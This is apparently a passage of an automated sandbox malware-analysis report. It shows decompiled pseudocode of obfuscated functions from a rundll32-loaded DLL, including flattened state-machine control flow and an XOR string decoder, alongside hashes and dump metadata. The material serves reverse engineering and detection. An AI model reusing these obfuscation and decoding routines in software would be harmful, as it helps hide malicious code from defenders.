                                                                        				unsigned int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				unsigned int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				intOrPtr _v88;
                                                                        				intOrPtr _v92;
                                                                        				intOrPtr _v96;
                                                                        				char _v148;
                                                                        				void* _t186;
                                                                        				void* _t214;
                                                                        				signed int _t221;
                                                                        				signed int _t222;
                                                                        				signed int _t223;
                                                                        				signed int _t224;
                                                                        				signed int _t225;
                                                                        				signed int _t226;
                                                                        				void* _t229;
                                                                        				intOrPtr* _t231;
                                                                        				intOrPtr* _t250;
                                                                        				signed int* _t251;
                                                                        				void* _t252;
                                                                        				void* _t253;
                                                                        
                                                                        				_push(_a12);
                                                                        				_t250 = _a8;
                                                                        				_t251 = __ecx;
                                                                        				_push(_t250);
                                                                        				_push(_a4);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t186);
                                                                        				_v84 = _v84 & 0x00000000;
                                                                        				_t253 = _t252 + 0x14;
                                                                        				_v96 = 0x42e790;
                                                                        				_v92 = 0x166b03;
                                                                        				_t229 = 0x403bd71;
                                                                        				_v88 = 0x3f33f0;
                                                                        				_v8 = 0xe45a;
                                                                        				_v8 = _v8 + 0x5419;
                                                                        				_v8 = _v8 + 0xffff7773;
                                                                        				_v8 = _v8 + 0xffff99fb;
                                                                        				_v8 = _v8 ^ 0x000024f5;
                                                                        				_v64 = 0xf2de;
                                                                        				_v64 = _v64 >> 5;
                                                                        				_v64 = _v64 ^ 0x00005589;
                                                                        				_v56 = 0x66c2;
                                                                        				_v56 = _v56 + 0xffff7624;
                                                                        				_v56 = _v56 ^ 0xfffffb7f;
                                                                        				_v80 = 0x220;
                                                                        				_t222 = 0x62;
                                                                        				_v80 = _v80 * 0x53;
                                                                        				_v80 = _v80 ^ 0x0000e004;
                                                                        				_v12 = 0x437a;
                                                                        				_v12 = _v12 << 0xf;
                                                                        				_v12 = _v12 + 0x349b;
                                                                        				_v12 = _v12 >> 0xc;
                                                                        				_v12 = _v12 ^ 0x00026b25;
                                                                        				_v76 = 0x38de;
                                                                        				_v76 = _v76 ^ 0x7523cf62;
                                                                        				_v76 = _v76 ^ 0x75239d7e;
                                                                        				_v68 = 0x7c01;
                                                                        				_v68 = _v68 >> 6;
                                                                        				_v68 = _v68 ^ 0x00006094;
                                                                        				_v20 = 0xa4cb;
                                                                        				_v20 = _v20 / _t222;
                                                                        				_t223 = 0x21;
                                                                        				_v20 = _v20 * 0xf;
                                                                        				_v20 = _v20 / _t223;
                                                                        				_v20 = _v20 ^ 0x00005a84;
                                                                        				_v52 = 0x5274;
                                                                        				_t224 = 0x27;
                                                                        				_v52 = _v52 * 0x22;
                                                                        				_v52 = _v52 ^ 0x000a8141;
                                                                        				_v36 = 0x5a3a;
                                                                        				_v36 = _v36 ^ 0x52f32f2b;
                                                                        				_v36 = _v36 ^ 0xad8d6857;
                                                                        				_v36 = _v36 ^ 0xff7e4623;
                                                                        				_v60 = 0x640e;
                                                                        				_v60 = _v60 * 0x1b;
                                                                        				_v60 = _v60 ^ 0x000ab987;
                                                                        				_v48 = 0xd288;
                                                                        				_v48 = _v48 + 0x2c37;
                                                                        				_v48 = _v48 / _t224;
                                                                        				_v48 = _v48 ^ 0x00004291;
                                                                        				_v28 = 0x54fc;
                                                                        				_t225 = 0x60;
                                                                        				_v28 = _v28 * 0x66;
                                                                        				_v28 = _v28 << 0xd;
                                                                        				_v28 = _v28 ^ 0x3b8d04ed;
                                                                        				_v40 = 0x2878;
                                                                        				_v40 = _v40 / _t225;
                                                                        				_v40 = _v40 << 0xa;
                                                                        				_v40 = _v40 ^ 0x0001c54a;
                                                                        				_v32 = 0x68e5;
                                                                        				_v32 = _v32 + 0xffffcd4c;
                                                                        				_v32 = _v32 | 0x885dfaf7;
                                                                        				_v32 = _v32 ^ 0x885dba23;
                                                                        				_v44 = 0x878a;
                                                                        				_v44 = _v44 | 0xeb76a9e1;
                                                                        				_v44 = _v44 >> 9;
                                                                        				_v44 = _v44 ^ 0x0075e19b;
                                                                        				_v72 = 0x39a;
                                                                        				_t226 = 0x64;
                                                                        				_v72 = _v72 / _t226;
                                                                        				_v72 = _v72 ^ 0x00000009;
                                                                        				_v16 = 0xa456;
                                                                        				_v16 = _v16 + 0x7679;
                                                                        				_v16 = _v16 | 0x2099d5c3;
                                                                        				_v16 = _v16 * 0x46;
                                                                        				_v16 = _v16 ^ 0xea13369a;
                                                                        				_v24 = 0xa266;
                                                                        				_v24 = _v24 >> 6;
                                                                        				_v24 = _v24 | 0x0bc7efd3;
                                                                        				_v24 = _v24 ^ 0x2d3320f9;
                                                                        				_v24 = _v24 ^ 0x26f4c722;
                                                                        				while(_t229 != 0x403bd71) {
                                                                        					if(_t229 == 0xd2426f1) {
                                                                        						E10018582(_v28, _t250 + 4, __eflags, _v40,  &_v148, _v32, _v44);
                                                                        					} else {
                                                                        						if(_t229 == 0x30c0e3fb) {
                                                                        							_t231 = _t250;
                                                                        							_t251[1] = E1001DD78(_t231);
                                                                        							_push(_t231);
                                                                        							_t214 = E1000607F(_t231, __eflags, _t231, _v24, _v16);
                                                                        							_t253 = _t253 + 0x10;
                                                                        							_t229 = 0x39b72fa5;
                                                                        							_t251[1] = _t251[1] + _t214;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t229 == 0x36f770cf) {
                                                                        								E1001F3E9(_v68, _v20, _v52, _t251,  &_v148);
                                                                        								_t253 = _t253 + 0xc;
                                                                        								_t229 = 0x388f3786;
                                                                        								continue;
                                                                        							} else {
                                                                        								if(_t229 == 0x388f3786) {
                                                                        									E1000CD04(_v36,  *_t250, _v60,  &_v148, _v48);
                                                                        									_t253 = _t253 + 0xc;
                                                                        									_t229 = 0xd2426f1;
                                                                        									continue;
                                                                        								} else {
                                                                        									if(_t229 != 0x39b72fa5) {
                                                                        										L13:
                                                                        										__eflags = _t229 - 0x7f1da96;
                                                                        										if(__eflags != 0) {
                                                                        											continue;
                                                                        										} else {
                                                                        										}
                                                                        									} else {
                                                                        										_push(_t229);
                                                                        										_t221 = E100157E8(_t251[1]);
                                                                        										 *_t251 = _t221;
                                                                        										if(_t221 != 0) {
                                                                        											_t229 = 0x36f770cf;
                                                                        											continue;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					__eflags =  *_t251;
                                                                        					_t185 =  *_t251 != 0;
                                                                        					__eflags = _t185;
                                                                        					return 0 | _t185;
                                                                        				}
                                                                        				_t229 = 0x30c0e3fb;
                                                                        				 *_t251 =  *_t251 & 0x00000000;
                                                                        				__eflags =  *_t251;
                                                                        				_t251[1] = _v72;
                                                                        				goto L13;
                                                                        			}

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • Opcode ID: 490a59cf89d529a46df9be0ebdbdf52a9a2cfee8a79e3243f32e0f1b5be57fa4
                                                                        • Instruction ID: 3e953d3043e1b2612aa2013cd6f624c31347c1387879b6d22a10554e2811d0ce
                                                                        • Opcode Fuzzy Hash: 490a59cf89d529a46df9be0ebdbdf52a9a2cfee8a79e3243f32e0f1b5be57fa4
                                                                        • Instruction Fuzzy Hash: FAA135B5D00209DBEF18CFA5D98A5EEFBB2FF04348F208119E511BA290D7B95A85CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E1001D2CB(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				void* _t102;
                                                                        				intOrPtr _t117;
                                                                        				signed int _t120;
                                                                        				signed int _t126;
                                                                        				signed int _t127;
                                                                        				signed int _t128;
                                                                        				signed int _t129;
                                                                        				void* _t130;
                                                                        				intOrPtr _t132;
                                                                        				intOrPtr _t145;
                                                                        
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(0x10021000);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t102);
                                                                        				_v8 = 0x5955;
                                                                        				_t126 = 0x64;
                                                                        				_v8 = _v8 / _t126;
                                                                        				_v8 = _v8 >> 5;
                                                                        				_v8 = _v8 << 0xf;
                                                                        				_v8 = _v8 ^ 0x0003dad4;
                                                                        				_v32 = 0x6516;
                                                                        				_v32 = _v32 + 0xffff2696;
                                                                        				_v32 = _v32 ^ 0xffff8a6f;
                                                                        				_v12 = 0xe36b;
                                                                        				_t127 = 0x33;
                                                                        				_v12 = _v12 / _t127;
                                                                        				_v12 = _v12 | 0x8ae53edf;
                                                                        				_t128 = 0x55;
                                                                        				_v12 = _v12 * 0x17;
                                                                        				_v12 = _v12 ^ 0x7a98878f;
                                                                        				_v24 = 0xe515;
                                                                        				_v24 = _v24 * 0x63;
                                                                        				_t129 = 0x24;
                                                                        				_v24 = _v24 / _t128;
                                                                        				_v24 = _v24 ^ 0x00017ed2;
                                                                        				_v20 = 0x2395;
                                                                        				_v20 = _v20 | 0xb3f3aeab;
                                                                        				_v20 = _v20 + 0xaf88;
                                                                        				_v20 = _v20 ^ 0xb3f45cc9;
                                                                        				_v28 = 0x9af0;
                                                                        				_v28 = _v28 * 0x39;
                                                                        				_v28 = _v28 ^ 0xd7063ba5;
                                                                        				_v28 = _v28 ^ 0xd7241e55;
                                                                        				_v44 = 0x4d1f;
                                                                        				_v44 = _v44 >> 2;
                                                                        				_v44 = _v44 ^ 0x00005248;
                                                                        				_v40 = 0x8238;
                                                                        				_t130 = 0x44;
                                                                        				_v40 = _v40 / _t129;
                                                                        				_v40 = _v40 ^ 0x00002f18;
                                                                        				_v36 = 0x2afb;
                                                                        				_v36 = _v36 ^ 0xf2c87ef6;
                                                                        				_v36 = _v36 ^ 0xf2c81ca8;
                                                                        				_v16 = 0xbb48;
                                                                        				_v16 = _v16 | 0x7786f7dc;
                                                                        				_v16 = _v16 ^ 0x7786ffdc;
                                                                        				_t117 = E100157E8(_t130);
                                                                        				 *0x100221c0 = _t117;
                                                                        				if(_t117 == 0) {
                                                                        					L7:
                                                                        					return 0;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t117 + 4)) = 0x10021000;
                                                                        				 *((intOrPtr*)(_t117 + 0x18)) = 0x10021000;
                                                                        				_t132 =  *0x100221c0;
                                                                        				_t145 =  *((intOrPtr*)(_t132 + 4));
                                                                        				 *(_t132 + 0x40) = _v16;
                                                                        				_t120 =  *(_t132 + 0x28);
                                                                        				while( *((intOrPtr*)(_t145 + _t120 * 8)) != 0) {
                                                                        					_t120 = _t120 + 1;
                                                                        					 *(_t132 + 0x28) = _t120;
                                                                        				}
                                                                        				if(E1001E19F(_v24, _v20, _a8) == 0) {
                                                                        					E100091CD(_v28, _v44, _v40,  *0x100221c0, _v36);
                                                                        					goto L7;
                                                                        				}
                                                                        				return 1;
                                                                        			}

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 555d0e0e36ac76e63080e4b91e516dd9c6c4ce408a46649481adf2781e1e811b
                                                                        • Instruction ID: 32c1e0764edadb428603f859bd3287ae8af053e8bec179c7a9d038295433632f
                                                                        • Opcode Fuzzy Hash: 555d0e0e36ac76e63080e4b91e516dd9c6c4ce408a46649481adf2781e1e811b
                                                                        • Instruction Fuzzy Hash: 56513675D00209EFDB08DFA4D98A5DEBBF1FB09314F20805AD505BB290D7B59A91CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E100173C0(void* __ecx, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				char _v48;
                                                                        				signed int _t138;
                                                                        				signed int _t139;
                                                                        				signed int _t140;
                                                                        				void* _t149;
                                                                        				signed int _t150;
                                                                        				void* _t153;
                                                                        
                                                                        				_t153 = __eflags;
                                                                        				_v24 = 0x158c;
                                                                        				_v24 = _v24 | 0xc19b8b86;
                                                                        				_v24 = _v24 + 0xffffcdb5;
                                                                        				_v24 = _v24 ^ 0xc19b1e12;
                                                                        				_v8 = 0x1996;
                                                                        				_v8 = _v8 + 0xffffce0e;
                                                                        				_t149 = __ecx;
                                                                        				_v8 = _v8 * 0x33;
                                                                        				_v8 = _v8 << 2;
                                                                        				_v8 = _v8 ^ 0xffeca024;
                                                                        				_v40 = 0x2715;
                                                                        				_v40 = _v40 << 2;
                                                                        				_v40 = _v40 ^ 0x0000a273;
                                                                        				_v12 = 0x2149;
                                                                        				_v12 = _v12 << 1;
                                                                        				_v12 = _v12 >> 2;
                                                                        				_v12 = _v12 ^ 0x1e3791f4;
                                                                        				_v12 = _v12 ^ 0x1e37d0cb;
                                                                        				_v28 = 0xe2f1;
                                                                        				_v28 = _v28 << 3;
                                                                        				_v28 = _v28 << 2;
                                                                        				_v28 = _v28 ^ 0x001c0c8b;
                                                                        				_v36 = 0x4110;
                                                                        				_v36 = _v36 + 0xffff4283;
                                                                        				_v36 = _v36 ^ 0xffffc6f6;
                                                                        				_v20 = 0x5435;
                                                                        				_v20 = _v20 >> 4;
                                                                        				_v20 = _v20 << 7;
                                                                        				_t138 = 0xe;
                                                                        				_v20 = _v20 / _t138;
                                                                        				_v20 = _v20 ^ 0x00005afa;
                                                                        				_v16 = 0x4238;
                                                                        				_v16 = _v16 + 0xe21;
                                                                        				_v16 = _v16 ^ 0xb01b9cfe;
                                                                        				_v16 = _v16 ^ 0x6bc8f8c5;
                                                                        				_v16 = _v16 ^ 0xdbd331c2;
                                                                        				_v32 = 0x5416;
                                                                        				_t139 = 0x7b;
                                                                        				_v32 = _v32 * 0x2f;
                                                                        				_v32 = _v32 >> 0x10;
                                                                        				_v32 = _v32 ^ 0x000053bd;
                                                                        				_v44 = 0x8a9a;
                                                                        				_v44 = _v44 / _t139;
                                                                        				_v44 = _v44 ^ 0x00006f27;
                                                                        				_v48 = E10017B6B();
                                                                        				_v8 = 0x4004;
                                                                        				_v8 = _v8 + 0xffff74e9;
                                                                        				_v8 = _v8 | 0xacc11b51;
                                                                        				_t140 = 0x54;
                                                                        				_push(_t140);
                                                                        				_v8 = _v8 / _t140;
                                                                        				_v8 = _v8 ^ 0x030c2ffb;
                                                                        				_v24 = 0x843c;
                                                                        				_v24 = _v24 | 0xd1d25750;
                                                                        				_v24 = _v24 * 0x7a;
                                                                        				_v24 = _v24 ^ 0xfe7ab108;
                                                                        				_t150 = E1000607F(_t140, _t153, _t140, _v24, _v8);
                                                                        				E1000D940(_t149, _v16, _v32, _v44, 3,  &_v48, _t150);
                                                                        				 *((short*)(_t149 + _t150 * 2)) = 0;
                                                                        				return 0;
                                                                        			}

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d86156a53a794c3a1ea69ef44ad5d1bbdd6e349abb558353b653a94269d0cae3
                                                                        • Instruction ID: aa47c26f155a7e2cbc498b37881a1f4ddfca2c0909b3e0a1f8a2a5a537750eba
                                                                        • Opcode Fuzzy Hash: d86156a53a794c3a1ea69ef44ad5d1bbdd6e349abb558353b653a94269d0cae3
                                                                        • Instruction Fuzzy Hash: B351D2B1D0120AEBDF48CFA5DA8A8DEBBB1FB48314F208159D112B72A0D3B55B45CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E1001BF25(void* __ecx, void* __edx, void* __eflags) {
                                                                        				void* _t49;
                                                                        				signed int _t56;
                                                                        				short* _t72;
                                                                        				signed int _t73;
                                                                        				signed int _t75;
                                                                        				signed int _t76;
                                                                        				signed int _t77;
                                                                        				signed int _t84;
                                                                        				unsigned int _t85;
                                                                        				unsigned int _t86;
                                                                        				short* _t93;
                                                                        				signed int* _t94;
                                                                        				signed int* _t95;
                                                                        				signed int* _t96;
                                                                        				unsigned int _t98;
                                                                        				void* _t104;
                                                                        				short _t106;
                                                                        				void* _t108;
                                                                        				void* _t109;
                                                                        
                                                                        				_t96 =  *(_t108 + 0x1c);
                                                                        				_push(_t96);
                                                                        				_push( *(_t108 + 0x20));
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t49);
                                                                        				 *(_t108 + 0x1c) = 0x8b96;
                                                                        				_t94 =  &(_t96[1]);
                                                                        				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffff20a0;
                                                                        				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffff41f6;
                                                                        				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) << 0xc;
                                                                        				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xeee2dc93;
                                                                        				 *(_t108 + 0x30) = 0x710f;
                                                                        				 *(_t108 + 0x30) =  *(_t108 + 0x30) | 0x6ece5f34;
                                                                        				_t75 = 0x49;
                                                                        				 *(_t108 + 0x34) =  *(_t108 + 0x30) / _t75;
                                                                        				_t76 = 0x78;
                                                                        				 *(_t108 + 0x30) =  *(_t108 + 0x34) / _t76;
                                                                        				 *(_t108 + 0x30) =  *(_t108 + 0x30) ^ 0x00037f97;
                                                                        				_t77 =  *_t96;
                                                                        				_t95 =  &(_t94[1]);
                                                                        				_t56 =  *_t94 ^ _t77;
                                                                        				 *(_t108 + 0x20) = _t77;
                                                                        				 *(_t108 + 0x24) = _t56;
                                                                        				_t98 =  !=  ? (_t56 + 0x00000001 & 0xfffffffc) + 4 : _t56 + 1;
                                                                        				_t109 = _t108 + 0xc;
                                                                        				_t72 = E100157E8(_t98 + _t98);
                                                                        				 *((intOrPtr*)(_t109 + 0x24)) = _t72;
                                                                        				if(_t72 != 0) {
                                                                        					_t106 = 0;
                                                                        					_t93 = _t72;
                                                                        					_t104 =  >  ? 0 :  &(_t95[_t98 >> 2]) - _t95 + 3 >> 2;
                                                                        					if(_t104 != 0) {
                                                                        						_t73 =  *(_t109 + 0x14);
                                                                        						do {
                                                                        							_t84 =  *_t95;
                                                                        							_t95 =  &(_t95[1]);
                                                                        							_t85 = _t84 ^ _t73;
                                                                        							 *_t93 = _t85 & 0x000000ff;
                                                                        							_t93 = _t93 + 8;
                                                                        							 *((short*)(_t93 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
                                                                        							_t86 = _t85 >> 0x10;
                                                                        							_t106 = _t106 + 1;
                                                                        							 *((short*)(_t93 - 4)) = _t86 & 0x000000ff;
                                                                        							 *((short*)(_t93 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
                                                                        						} while (_t106 < _t104);
                                                                        						_t72 =  *((intOrPtr*)(_t109 + 0x24));
                                                                        					}
                                                                        					 *((short*)(_t72 +  *(_t109 + 0x18) * 2)) = 0;
                                                                        				}
                                                                        				return _t72;
                                                                        			}























                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e2487da670dfdf4340291a23b1239054837bb09989d1aae364528b122fc451e
                                                                        • Instruction ID: 31a9db1899cf95c0ebf8ee9652300adac22cb49fd3d05de2bcc5fa7de42ab8ee
                                                                        • Opcode Fuzzy Hash: 7e2487da670dfdf4340291a23b1239054837bb09989d1aae364528b122fc451e
                                                                        • Instruction Fuzzy Hash: 6C318C76A183119FD314CF29C88596BF7E1FF88610F414A2EF98597280DB74E909CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E1000903F(void* __ecx, signed int __edx) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				intOrPtr _v60;
                                                                        				signed int _t136;
                                                                        				signed int _t137;
                                                                        				signed int _t138;
                                                                        
                                                                        				_v56 = _v56 & 0x00000000;
                                                                        				_v52 = _v52 & 0x00000000;
                                                                        				_v60 = 0x4b89aa;
                                                                        				_v24 = 0xd383;
                                                                        				_v24 = _v24 >> 1;
                                                                        				_v24 = _v24 + 0xffff6796;
                                                                        				_v24 = _v24 ^ 0xffff9ecb;
                                                                        				_v40 = 0x275e;
                                                                        				_v40 = _v40 >> 0xb;
                                                                        				_v40 = _v40 ^ 0x00004c05;
                                                                        				_v36 = 0x2d7f;
                                                                        				_v36 = _v36 << 0xa;
                                                                        				_v36 = _v36 ^ 0x00b5d622;
                                                                        				_v12 = 0x609d;
                                                                        				_v12 = _v12 * 0x39;
                                                                        				_t136 = 0x71;
                                                                        				_v12 = _v12 * 0x6d;
                                                                        				_v12 = _v12 << 2;
                                                                        				_v12 = _v12 ^ 0x24a35bb0;
                                                                        				_v8 = 0x6158;
                                                                        				_v8 = _v8 ^ 0x69c6b5b2;
                                                                        				_v8 = _v8 / _t136;
                                                                        				_v8 = _v8 << 0xa;
                                                                        				_v8 = _v8 ^ 0xbe8af890;
                                                                        				_v44 = 0xc5d5;
                                                                        				_v44 = _v44 | 0xbfd7fc3e;
                                                                        				_v44 = _v44 ^ 0xbfd7cdf6;
                                                                        				_v28 = 0x68fd;
                                                                        				_v28 = _v28 >> 0xd;
                                                                        				_v28 = _v28 + 0xaf9b;
                                                                        				_v28 = _v28 ^ 0x0000e0c3;
                                                                        				_v32 = 0xe5f5;
                                                                        				_v32 = _v32 ^ 0x15b965a8;
                                                                        				_v32 = _v32 | 0x20bfb64a;
                                                                        				_v32 = _v32 ^ 0x35bfa224;
                                                                        				_v20 = 0x2af5;
                                                                        				_t137 = 0x36;
                                                                        				_v20 = _v20 / _t137;
                                                                        				_v20 = _v20 + 0xffff0be2;
                                                                        				_v20 = _v20 ^ 0xaeef640c;
                                                                        				_v20 = _v20 ^ 0x5110195f;
                                                                        				_v48 = 0xf5d2;
                                                                        				_t138 = 0x45;
                                                                        				_push(__ecx);
                                                                        				_v48 = _v48 / _t138;
                                                                        				_v48 = _v48 ^ 0x00004994;
                                                                        				_v16 = 0x4a26;
                                                                        				_v16 = _v16 + 0xffffa2aa;
                                                                        				_v16 = _v16 >> 7;
                                                                        				_v16 = _v16 << 7;
                                                                        				_v16 = _v16 ^ 0xffff886f;
                                                                        				_push(_v36);
                                                                        				 *((intOrPtr*)( *0x100221b8 + 0x2c + __edx * 4)) = E10003708(_v12, _v8, _v44, E1001BF25(_v24, _v40, _v16), _v28);
                                                                        				return E1001C5F7(_v32, _v20, _v48, _v16, _t117);
                                                                        			}





















                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aa57aaca734bfc9d27f03b23d266dafba2ef08ab062a3d772196c9d4fa76611c
                                                                        • Instruction ID: 92030473fc267208a45804a0a9107ff8cc935f9157fe0e4ef1b606325668945c
                                                                        • Opcode Fuzzy Hash: aa57aaca734bfc9d27f03b23d266dafba2ef08ab062a3d772196c9d4fa76611c
                                                                        • Instruction Fuzzy Hash: BE41FEB1D0061DEBDF58CFA5C98A5EEBFB1FB48314F208198D411B62A0D7B91A46CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 15%
                                                                        			E10008CA3(void* __eflags) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				char _v36;
                                                                        				char _v556;
                                                                        				void* _t89;
                                                                        				intOrPtr* _t91;
                                                                        				signed int _t95;
                                                                        				signed int _t96;
                                                                        				signed int _t109;
                                                                        
                                                                        				_v36 = 0;
                                                                        				_v32 = 0x29d5;
                                                                        				_v32 = _v32 ^ 0x626c2200;
                                                                        				_v32 = _v32 ^ 0x626c072c;
                                                                        				_v16 = 0x8a53;
                                                                        				_v16 = _v16 ^ 0xc3c6da5f;
                                                                        				_v16 = _v16 << 2;
                                                                        				_v16 = _v16 | 0xabb7532b;
                                                                        				_v16 = _v16 ^ 0xafbf763a;
                                                                        				_v20 = 0x925b;
                                                                        				_t95 = 0x78;
                                                                        				_v20 = _v20 / _t95;
                                                                        				_t96 = 0x72;
                                                                        				_v20 = _v20 / _t96;
                                                                        				_v20 = _v20 << 0xe;
                                                                        				_v20 = _v20 ^ 0x0000e1f3;
                                                                        				_v24 = 0x334;
                                                                        				_v24 = _v24 + 0x5249;
                                                                        				_t109 = 0x5c;
                                                                        				_push(_t96);
                                                                        				_v24 = _v24 * 0x21;
                                                                        				_v24 = _v24 ^ 0x000b38a4;
                                                                        				_v28 = 0x9636;
                                                                        				_v28 = _v28 >> 3;
                                                                        				_v28 = _v28 ^ 0x00001dee;
                                                                        				_v12 = 0xb2e5;
                                                                        				_v12 = _v12 >> 9;
                                                                        				_v12 = _v12 ^ 0x878b803c;
                                                                        				_v12 = _v12 << 4;
                                                                        				_v12 = _v12 ^ 0x78b81fbb;
                                                                        				_v8 = 0xb95e;
                                                                        				_v8 = _v8 >> 7;
                                                                        				_v8 = _v8 / _t109;
                                                                        				_v8 = _v8 * 0x1d;
                                                                        				_v8 = _v8 ^ 0x00001e7b;
                                                                        				_t89 = E1001372F( &_v556, _v32, _v16);
                                                                        				_pop(0);
                                                                        				if(_t89 != 0) {
                                                                        					_t91 =  &_v556;
                                                                        					if(_v556 != 0) {
                                                                        						while( *_t91 != _t109) {
                                                                        							_t91 = _t91 + 2;
                                                                        							if( *_t91 != 0) {
                                                                        								continue;
                                                                        							} else {
                                                                        							}
                                                                        							goto L6;
                                                                        						}
                                                                        						 *((short*)(_t91 + 2)) = 0;
                                                                        					}
                                                                        					L6:
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(_v8);
                                                                        					_push(_v12);
                                                                        					_push(0);
                                                                        					_push( &_v556);
                                                                        					_push( &_v36);
                                                                        					_push(_v28);
                                                                        					E1001C50B(_v20, _v24);
                                                                        				}
                                                                        				return _v36;
                                                                        			}


















                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b6b1417c14184671c41ad61bda5044eabbd7f3f842d6e1b0d6b422026d02d4ca
